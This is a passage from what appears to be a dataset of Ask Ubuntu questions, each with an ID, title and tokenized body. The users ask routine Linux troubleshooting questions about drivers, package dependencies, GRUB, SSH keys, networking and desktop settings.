( size=4 ) ioport : fe60 ( size=8 ) ioport : fe70 ( size=4 ) ioport : fed0 ( size=16 ) ioport : ecb0 ( size=16 ) and rfkill list all returns nothing and iwconfig returns : lo no wireless extensions . eth0 no wireless extensions . update : result for lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 002 : id 413c:2107 dell computer corp . bus 006 device 002 : id 062a:0000 creative labs optical mouse i have a netgear wnda3100 usb adapter from before , but i have only used it with windows . so if this computer needs an usb adapter to connect to the wireless , can i still use it ? last but not least , thank you all for your inputs ! sorry that i could n't update my question soon enough because of my work but i will try my best to respond as soon as i can .
421970	sharp network scanner tool ?	hello i was searching but not found about sharp network scanner tool ? is there any way my sharp machine scanner work with ubuntu ? ? ? thanks !
421971	ssh key exchange `` knowledge '' problem	this question may sound a duplicate , but i am confident it is not . i 'm playing around a vm with ubuntu 12.0.4lts to learn something and my mac os 10.9 , establishing an ssh connection as per my title . both the vm ( guest ) and my local computer ( host ) have the ssh keys in place . in theory a key was required only for the host , because no reverse connections to the guest are required ( but that 's a different story ) . however - and that 's the problem - while trying to ssh to the guest , the host returns always a permission denied message even though the fingerprint have been transmitted . the authenticity of host 'test.me ( 172.90.90.91 ) ' ca n't be established . rsa key fingerprint is bf:95:70 : b1:20:69 : b3 : e6 : a4:2e:58:4b:7e : fc : d9:71 . are you sure you want to continue connecting ( yes/no ) ? yes i know this is due to the host key not being included in the authorized-keys file of my guest ( ubuntu ) . in fact by manually adding the key everything went fine . but that 's the weird thing . from the host i was able to ssh connect to my guest , and once asked the same fingerprint message above , the connection was established without problems . so that 's the question . why my guest ( ubuntu ) was able to add the fingerprint and connect to the host ( mac ) without problems and not vice versa ? is this a problem / setting in the openssh config of the server ? if so , what is this option ? is the vm ( mac ) setting too insecure to accept every ssh fingerprint ? is this somewhat connected to the passwordauthentication setting of the server ? and would you recommend to add this to the mac too ? thanks andrea
421973	un-install xubuntu-desktop getting error	~ $ sudo apt-get remove xubuntu-desktop [ sudo ] password for daya : reading package lists ... done building dependency tree reading state information ... done e : the package win2-7 needs to be reinstalled , but i ca n't find an archive for it .
421975	how to detect events like lock/unlock screen , enter/return suspend and monitor power off	i am wondering if there is any way to detect system wide events under linux such as : user un/locked session user logs in/out machine sent to suspend screensaver goes on and the monitor switches off due inactivity i need this for a qt project where i programmatically react to such events , but i am uncertain how and where to start . maybe there is an api that i dont know yet . any hints ? i would appreciate any help !
421976	how to set my bluetooth python script on higher priority than ubuntu 's request ?	i have got a bluetooth python server script on ubuntu to connect with an incoming request from a smartphone device . however ubuntu 's bluetooth is getting the request before my script can react on it . how can i set my script on 1st priority ? simple server script : import bluetooth server_sock=bluetooth.bluetoothsocket ( bluetooth.rfcomm ) port = 1 server_sock.bind ( ( `` '' , port ) ) server_sock.listen ( 1 ) client_sock , address = server_sock.accept ( ) print `` accepted connection from `` , address data = client_sock.recv ( 1024 ) print `` received [ % s ] '' % data client_sock.close ( ) server_sock.close ( )
421977	problem installing ubuntu 13.10 on legacy bios machine	sorry for my bad grammar , but i need help to install new ubuntu on my pc.i 've a lenovo z570 laptop with following specs : intel i5 2430m 4 gb ram nvidia 520m ( optimus ) - switchable with intel hd 3000 750 gb hdd i 've installed windows 8 in legacy bios mode as pc does n't support uefi . when i try to install ubuntu 13.10 , it tries to install in efi mode i.e . boot screen - black and with a error message first could n't open '\efi\boot\fallback.efi':14 after configuring the installation , installation fails at last step with the following message : grub-efi-amd64-signed failed to install into /target/ does anyone have the same problem ? what should i do now ? extra info : gnu parted output ( sudo parted -l ) model : ata wdc wd7500bpvt-2 ( scsi ) disk /dev/sda : 750gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 65.8gb 65.8gb primary ntfs boot 2 686gb 690gb 4201mb extended 5 686gb 690gb 4201mb logical linux-swap ( v1 ) 3 690gb 750gb 60.2gb primary ext4
421978	problem booting windows 8	ive installed ubuntu with windows 8 side by side ... i am not able to boot with windows 8.option to boot is shown while starting machine..but when i select to boot win 8 it return to same place.all files in windows 8 partition are okay but still it wont t
421980	how to take screenshot of complete webpages ?	i have used shutter and screenshot applications for a long time for taking screenshots.but they can only take screenshots as big as the physical screen . sometimes i have to take an screenshot of an whole webpage , because the page ca n't be saved properly by the browser or i want to include pop-up 's as well.this situation requires a software that can take a screenshot longer than the physical screen . is there any software to do this ? note that this question and it 's answers are about webpage saving apps.they wo n't save pop-up 's , which is essential in my case.i do n't want a converter.i need an literal screenshot app or anything that could save the pop-up 's as well . and i use mozilla firefox , because it has really nice plugins.the solution should be working fot firefox itself .
421982	why are the cpu frequency timing statistics all zeros ?	the cpufreq timing statistics are all zeros : $ sort -- unique /sys/devices/system/cpu/cpu*/cpufreq/stats/time_in_state | column 1600000 0 2100000 0 2600000 0 3100000 0 1700000 0 2200000 0 2800000 0 3300000 0 1900000 0 2400000 0 2900000 0 3400000 0 2000000 0 2500000 0 3000000 0 3401000 0 how is this possible ? is there really no time spent in any state ? details /proc/cpuinfo the cpus are clearly transitioning between frequency states : $ grep -- perl-regexp -- only-matching ' ( ? < =cpu mhz\t\t : ) [ \d . ] + ' /proc/cpuinfo | column 1600.000 1600.000 3401.000 1600.000 2900.000 1600.000 2100.000 1600.000 $ while sleep 10 ; do column /sys/devices/system/cpu/cpu*/cpufreq/stats/total_trans ; done 17839 17278 17497 17336 12332 14358 14054 17647 17885 17313 17545 17384 12359 14394 14082 17691 17888 17323 17556 17391 12359 14399 14085 17693 17904 17336 17576 17417 12374 14402 14091 17696 someone else asked about this on a forum but never received a reply .
421984	ubuntu 13.10 no wired internet connection	i recently installed ubuntu 13.10 . this is my first os other than windows . i 'm able to connect to wifi but not via lan . could any please help me understand the issue ... i read through a lot but my bad i dont understand linux or codes or terminal . could anyone please explain what needs to be done and how in simple ... thanks : )
421985	nvidia-current brocken dependency	i tried install nvidia driver the following packages have unmet dependencies : nvidia-current : depends : nvidia-304 but it is not going to be installed e : unable to correct problems , you have held broken packages . user @ host : $ install nvidia-304 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-304 : depends : lib32gcc1 but it is not going to be installed depends : libc6-i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . but it have broken dependency . how install nvidia driver properly ?
421986	apt-get not working . /usr/bin/dpkg returned an error code ?	reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : aptitude-common libboost-iostreams1.53.0 libcwidget3 libept1.4.12 suggested packages : aptitude-doc-en aptitude-doc tasksel debtags libcwidget-dev the following packages will be removed : linux-image-3.11.0-15-generic linux-image-extra-3.11.0-15-generic the following new packages will be installed : aptitude aptitude-common libboost-iostreams1.53.0 libcwidget3 libept1.4.12 0 upgraded , 5 newly installed , 2 to remove and 4 not upgraded . 3 not fully installed or removed . need to get 2,647 kb of archives . after this operation , 174 mb disk space will be freed . do you want to continue [ y/n ] ? y get:1 http : //in.archive.ubuntu.com/ubuntu/ saucy/main libboost-iostreams1.53.0 amd64 1.53.0-6+exp3ubuntu8 [ 34.6 kb ] get:2 http : //in.archive.ubuntu.com/ubuntu/ saucy/main aptitude-common all 0.6.8.2-1ubuntu2 [ 700 kb ] get:3 http : //in.archive.ubuntu.com/ubuntu/ saucy/main libcwidget3 amd64 0.5.16-3.4ubuntu2 [ 401 kb ] get:4 http : //in.archive.ubuntu.com/ubuntu/ saucy/main libept1.4.12 amd64 1.0.9 [ 135 kb ] get:5 http : //in.archive.ubuntu.com/ubuntu/ saucy/main aptitude amd64 0.6.8.2-1ubuntu2 [ 1,377 kb ] fetched 2,647 kb in 16s ( 164 kb/s ) ( reading database ... 205837 files and directories currently installed . ) removing linux-image-extra-3.11.0-15-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-15-generic /boot/vmlinuz-3.11.0-15-generic update-initramfs : deleting /boot/initrd.img-3.11.0-15-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-15-generic /boot/vmlinuz-3.11.0-15-generic /usr/sbin/grub-mkconfig : 13 : /etc/default/grub : back : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-extra-3.11.0-15-generic.postrm line 328. dpkg : error processing linux-image-extra-3.11.0-15-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.11.0-15-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-15-generic /boot/vmlinuz-3.11.0-15-generic update-initramfs : deleting /boot/initrd.img-3.11.0-15-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-15-generic /boot/vmlinuz-3.11.0-15-generic /usr/sbin/grub-mkconfig : 13 : /etc/default/grub : back : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.11.0-15-generic.postrm line 328. dpkg : error processing linux-image-3.11.0-15-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-extra-3.11.0-15-generic linux-image-3.11.0-15-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this is what i get after apt-get . please explain the problem here and how to correct it in layman 's terms , as i am a linux noob . edit : sudo cat /etc/default/grub generates this # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' grub_cmdline_linux= '' '' back # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
421989	ubuntu , messed up default group ownership	i 've setup btsync on my pc and in order for it to access the folder i wanted to sync i had to set it 's owner and group to btsync . i did so by running sudo chown -r btsync : btsync ~/sync . or at least , i attempted that but i typo 'd it an accidentally set ~ 's group and owner to btsync . i tried to fix it by running sudo chown -r paul : paul ~ to fix the mess i made , but i keep seeing files group getting changed randomly to btsync . for example : ~ $ ll | grep btsync -rw-r -- r -- 1 paul btsync 25 feb 17 20:39 .dmrc drwxrwxrwx 7 btsync btsync 4096 feb 17 20:21 sync/ -rw -- -- -- - 1 paul btsync 711 feb 17 20:39 .xsession-errors the sync folder is supposed to be btsync : btsync , but the others keep reverting . additionally when i install programs through the software-center that install to my home directory . they appear to be installing with the : btsync group , where they should be : paul . ( for example when i install vidalia . ) can anyone help me fix whatever this issue is ? thanks to all in advance . update : i do n't know if this is necessary information , but i 'm runing ubuntu 13.10 64 bit .
421991	how to install freenx on a vps machine ?	i 've installed vnc before and was really bad so i decided to leave vnc and go to nx but the problem it 's i do n't know how to install the nx-server on my vps machine also do n't know how to connect remotely to the machine so anyone can tell me the best/correct way to install freenx ? note : i 'm not on an os complete system , it 's just a vps machine ( putty ) also i 'm trying to connect from windows os thanks
421994	about mininet , where i could not find required executable controller	i started mininet and gave commands *** creating network *** adding controller *** adding hosts : h1 h2 h3 h4 *** adding switches : s1 *** adding links : ( h1 , s1 ) ( h2 , s1 ) ( h3 , s1 ) ( h4 , s1 ) *** configuring hosts h1 h2 h3 h4 *** starting controller can not find required executable controller . please make sure that it is installed and available in your $ path : ( /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/x11r6/bin ) i tried to rectify it but ca n't .
421995	upgrade php5-gd on 12.04	i 'm aware there 's already a post with the same title , but my question is different : as i explain it in a stack overflow post , i need to use a more recent version of php-gd in my 12.04 ubuntu than the one shipped by apt-get , and as my system skills are kind of poor , i do n't know how to do that ( i think i need to somehow modify my packages repositories , but ... well i do n't know how ) . to be clear , in my osx dev machine , i have a `` bundled ( 2.1.0 compatible ) '' gd version , with a 1.6.2 libpng version . and in my ubuntu prod server , i 'm stuck with gd 2.0.36 ( see php-info ) . can i upgrade this , and how ? by the way , the reason of this is explained in the stack overflow post linked at the top : i have a huge quality difference in png resizing , and it seems gd is the cause of it . thanks a lot .
422001	about mininet , regarding an executable controller	i started mininet : sudo mn -- switch ovsk -- controller ref -- topo tree , depth=2 , fanout=3 -- test pingall [ sudo ] password for biju : *** creating network *** adding controller *** adding hosts : h1 h2 h3 h4 h5 h6 h7 h8 h9 *** adding switches : s1 s2 s3 s4 *** adding links : ( h1 , s2 ) ( h2 , s2 ) ( h3 , s2 ) ( h4 , s3 ) ( h5 , s3 ) ( h6 , s3 ) ( h7 , s4 ) ( h8 , s4 ) ( h9 , s4 ) ( s1 , s2 ) ( s1 , s3 ) ( s1 , s4 ) *** configuring hosts h1 h2 h3 h4 h5 h6 h7 h8 h9 *** starting controller can not find required executable controller . please make sure that it is installed and available in your $ path : ( /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin ) where can i find the controller ? ?
422005	grub usb not working in windows 7	i have just re-installed windows 7 in efi mode ( getting everything working in a new efi enabled mode ) and used boot-repair to get grub working again . however when booting into windows , there is a very high chance none of the usb ports will work . this does n't effect the ubuntu installation or the grub os selection screen . only windows is effected . also it only seems to cause a problem if i actually use a usb device . letting windows boot by default and using usb during the windows boot is fine . windows 7 did not have a problem before i installed grub . if i remove the ubuntu drive and let windows 7 boot normally everything is happy again . grub is breaking this . i can provide anything that is needed . but to be honest i do n't know where to start in debugging this . also my board only seems to provide usb 3 ports that i can tell . so usb 2 may not be an option . thanks for any help .
422006	fixing locale settings permanently	i am getting the 'unsupported locale setting ' error as referenced here ( on ubuntu 13.10 ) . however , following martijn suggestion only fixes the problem temporarily . opening a new bash reverts to the 'unsupported locale ' problem . any ideas how i can fix this permanently ?
422009	repair overwritten icons paths	after running racket-lang install-script all my /usr/share/application/*.desktop files have broken icon paths and corresponding shortcuts are displayed with question marks . paths are overwritten like this ( for standard terminal ) : icon=/usr/share/racket/utilities-terminal i 'm wondering , if there was a way of broking them at once , maybe there is some easy way to fix them all at once ? the problem is i do n't know how those paths were looking before . i 've tried to replace `` /usr/share/racket/ '' prefix to `` /usr/share/app-install/icons/ '' because i 've found this folder has related icons , but this does n't work until i explicitly specify icon 's extension so i ca n't just write some simple replace script here ( icon extensions vary from app to app : in some cases there is `` /usr/share/app-install/icons/app.svg '' , in other `` /usr/share/app-install/icons/another-app.png '' ) .
422012	how to install livewallpaper on ubuntu saucy 13.10 ?	how do i install livewallpaper on 13.10 . i tried youtube video and also tried the formula , it seems ubuntu 13.10 ca n't get the update for live wallpaper `` unable to find the packages '' .
422015	how can i fix position of screenlet ?	i am using ubuntu 13.04 and latest version of screenlet 0.1.7 . i have a naughty screenlet copystack . it stores clipboard contents as in stack in programming . when i empty its contents it moves up in the screen . i also notice that other screenlets changes position on relogin . how can i fix position of screenlets ?
422017	install r library e1071 manually	i need to install e1071 library manually . i downloaded the latest package of the same . but configure , though successful and without errors , does n't create a makefile . ./configure does the following : checking for c++ compiler default output file name ... a.out checking whether the c++ compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes
422021	unmet dependencies for libgl1-mesa-dev while initializing build environment for android	i am trying to setup build environment on ubuntu 12.04 ( precise ) ( 64bit ) . i am following the guide at official android site . i encountered the following message . $ sudo apt-get install libgl1-mesa-dev [ sudo ] password for buddy : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgl1-mesa-dev : depends : mesa-common-dev ( = 9.2.0~git20131002+9.2.2eb55601-0ubuntu0sarvatt~precise ) depends : libdrm-dev ( > = 2.4.45 ) e : unable to correct problems , you have held broken packages . i tried installing mesa-common-dev $ sudo apt-get install mesa-common-dev message the following packages have unmet dependencies : mesa-common-dev : depends : libdrm-dev ( > = 2.4.45 ) then i tried installing $ sudo apt-get install libdrm-dev message the following packages have unmet dependencies : libdrm-dev : depends : libdrm2 ( = 2.4.46-1ubuntu0.0.0.1 ) but 2.4.46+git20130702.c6d73cfe-0ubuntu0sarvatt~precise is to be installed depends : libdrm-intel1 ( = 2.4.46-1ubuntu0.0.0.1 ) but 2.4.46+git20130702.c6d73cfe-0ubuntu0sarvatt~precise is to be installed depends : libdrm-radeon1 ( = 2.4.46-1ubuntu0.0.0.1 ) but 2.4.46+git20130702.c6d73cfe-0ubuntu0sarvatt~precise is to be installed depends : libdrm-nouveau1a ( = 2.4.46-1ubuntu0.0.0.1 ) but 2.4.46+git20130702.c6d73cfe-0ubuntu0sarvatt~precise is to be installed depends : libdrm-nouveau2 ( = 2.4.46-1ubuntu0.0.0.1 ) but 2.4.46+git20130702.c6d73cfe-0ubuntu0sarvatt~precise is to be installed depends : libkms1 ( = 2.4.46-1ubuntu0.0.0.1 ) but 2.4.46+git20130702.c6d73cfe-0ubuntu0sarvatt~precise is to be installed e : unable to correct problems , you have held broken packages . then i tried the following steps mentioned here : how do i resolve unmet dependencies ? skipping the disable/remove/purge ppas part .
422025	how to install lamp in ubuntu 12.4 lts ?	i am interested in php mysql web programing so i want lamp in ubuntu operating software .
422026	mathematica installation problem	ubuntu 13.10 - 64 bit mathematica 9 . critical failure : printintroduction ( ) error $ producttitle not defined . help me to install .
422027	mod_rewrite is enabled , but not working	i 'm trying to get a php routing library set up . they give this example for a .htaccess file : rewriteengine on rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d rewriterule . index.php [ l ] i could n't get this to work , so i tried enabling mod_rewrite , but it says `` module rewrite already enabled '' . why is it not working properly ? thanks ! i 'm running ubuntu precise 12.04 , and apache2.2.22 . ( checked for any updates ) edit : a couple more details , it 's a puphpet vagrant build , rewrite should be enabled .
422028	mobile broadband modem will not connect with kernel 3.11 ubuntu 12.04.4	my mobile broadband modem works with kernel 3.2.0-58-generic # 88-ubuntu smp , however it fails to complete a connection with the new 3.11 kernel . does anyone have a solution to enable the modem with the 3.11 kernel ubuntu version is 12.04.4 modem is a serria wireless here is some log data the first section is ok - connected modem-manager [ 1194 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( connecting - > connected ) networkmanager [ 1222 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) scheduled ... networkmanager [ 1222 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) starting ... networkmanager [ 1222 ] : < info > ( wwan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] networkmanager [ 1222 ] : < info > ( wwan0 ) : bringing up device . networkmanager [ 1222 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) successful . networkmanager [ 1222 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) scheduled . networkmanager [ 1222 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) complete . networkmanager [ 1222 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) started ... networkmanager [ 1222 ] : < info > ( wwan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] networkmanager [ 1222 ] : < info > activation ( wwan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) networkmanager [ 1222 ] : < info > dhclient started with pid 5191 networkmanager [ 1222 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... networkmanager [ 1222 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) complete . networkmanager [ 1222 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... networkmanager [ 1222 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . this section failed to connect networkmanager [ 1288 ] : < info > auto-activating connection 'telstra ( next g ) ' . networkmanager [ 1288 ] : < info > activation ( wwan0 ) starting connection 'telstra ( next g ) ' networkmanager [ 1288 ] : < info > ( wwan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) scheduled ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) started ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) complete . modem-manager [ 1214 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( registered - > connecting ) modem-manager [ 1214 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( connecting - > connected ) networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) scheduled ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) starting ... networkmanager [ 1288 ] : < info > ( wwan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] networkmanager [ 1288 ] : < info > ( wwan0 ) : bringing up device . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) successful . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) scheduled . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) complete . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) started ... networkmanager [ 1288 ] : < info > ( wwan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] networkmanager [ 1288 ] : < info > activation ( wwan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) networkmanager [ 1288 ] : < info > dhclient started with pid 23608 networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) complete . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . kernel : [ 1116.168922 ] ipv6 : addrconf ( netdev_up ) : wwan0 : link is not ready networkmanager [ 1288 ] : < warn > ( wwan0 ) : dhcpv4 request timed out . networkmanager [ 1288 ] : < info > ( wwan0 ) : canceled dhcp transaction , dhcp client pid 23608 networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... networkmanager [ 1288 ] : < info > ( wwan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] networkmanager [ 1288 ] : < warn > activation ( wwan0 ) failed . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . networkmanager [ 1288 ] : < info > ( wwan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] networkmanager [ 1288 ] : < info > ( wwan0 ) : deactivating device ( reason 'none ' ) [ 0 ] modem-manager [ 1214 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( connected - > disconnecting ) networkmanager [ 1288 ] : < info > policy set 'wired - home network ' ( eth0 ) as default for ipv4 routing and dns . networkmanager [ 1288 ] : < info > policy set 'wired - home network ' ( eth0 ) as default for ipv4 routing and dns . modem-manager [ 1214 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( disconnecting - > registered ) networkmanager [ 1288 ] : < info > auto-activating connection 'telstra ( next g ) ' . networkmanager [ 1288 ] : < info > activation ( wwan0 ) starting connection 'telstra ( next g ) ' networkmanager [ 1288 ] : < info > ( wwan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) scheduled ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) started ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) complete . modem-manager [ 1214 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( registered - > connecting ) modem-manager [ 1214 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( connecting - > connected ) networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) scheduled ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) starting ... networkmanager [ 1288 ] : < info > ( wwan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] networkmanager [ 1288 ] : < info > ( wwan0 ) : bringing up device . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) successful . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) scheduled . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) complete . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) started ... networkmanager [ 1288 ] : < info > ( wwan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] networkmanager [ 1288 ] : < info > activation ( wwan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) kernel : [ 1166.280233 ] ipv6 : addrconf ( netdev_up ) : wwan0 : link is not ready networkmanager [ 1288 ] : < info > dhclient started with pid 25900 networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) complete . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . networkmanager [ 1288 ] : < info > ( wwan0 ) : dhcpv4 state changed nbi - > preinit networkmanager [ 1288 ] : < warn > ( wwan0 ) : dhcpv4 request timed out . networkmanager [ 1288 ] : < info > ( wwan0 ) : canceled dhcp transaction , dhcp client pid 25900 networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... networkmanager [ 1288 ] : < info > ( wwan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] networkmanager [ 1288 ] : < info > marking connection 'telstra ( next g ) ' invalid . networkmanager [ 1288 ] : < warn > activation ( wwan0 ) failed . networkmanager [ 1288 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . modem-manager [ 1214 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( connected - > disconnecting ) networkmanager [ 1288 ] : < info > ( wwan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] networkmanager [ 1288 ] : < info > ( wwan0 ) : deactivating device ( reason 'none ' ) [ 0 ]
422029	problems with software center can not see whats installed	i cant see whats installed , when i select ubuntu software center it comes up white , oh im a complete newbie , ive moved my laptop from winxp to ubuntu 13.10
422030	how to bind ip’s on ubuntu server ?	i recently installed ubuntu . and i want to know how to bind ip’s on ubuntu server ?
422031	moving from svn to git , best way to copy full repos ?	we are changing from svn to git , and i wonder which is the best way to copy the files from one to another server . for that i would use rsync but i need to know if i can first copy the files and than convert the new folder a git repository or should i first create the repos and copy the files in later ? or is there no difference ?
422033	bind-dlz-ldap segmentation fault	i 've installed bind-9.5.5 with dlz-ldap support and everything works fine but when i want to run bind i got this error '' ldap driver could not create database instance object . segmentation fault ( core dumped ) can you help me please
422034	changing the user picture in ubuntu menu	i 'm running ubuntu 12.04 . i want to change the user picture in the 'fast user switching menu ' . i 've followed this thread and managed to change the picture on the log-on screen by changing ~/.face . however , when i click the cogwheel in the top right of the screen , a menu drops down which includes my username and old picture . is there a way to change this smaller menu picture ?
